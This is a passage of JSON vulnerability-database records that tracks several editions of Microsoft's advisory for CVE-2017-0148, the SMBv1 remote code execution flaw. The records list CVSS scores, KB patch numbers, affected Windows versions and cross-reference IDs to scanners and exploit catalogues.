x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T18:46:41", "differentElements": ["msAffectedSoftware"], "edition": 5}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-03T20:42:24", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-03T20:42:24", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-03T20:42:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4012606", "KB4012215", "KB3212646", "KB4013429", "KB3205401", "KB4012213", "KB4012212", "KB4012217", "KB3205409", "KB4012598", "KB3210721", "KB4012214", "KB3177186", "KB4013198", "KB3210720", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T20:42:24", "differentElements": ["msAffectedSoftware"], "edition": 6}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-04T06:47:20", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T06:47:20", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-04T06:47:20", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3205409", "KB3177186", "KB4012217", "KB4012215", "KB3213986", "KB3212646", "KB4012213", 
"KB4013429", "KB3205401", "KB4013198", "KB4012214", "KB4012606", "KBMS16-110, 3187754", "KB3210721", "KB3210720", "KB4012216", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T06:47:20", "differentElements": ["msAffectedSoftware"], "edition": 7}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-04T08:55:45", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
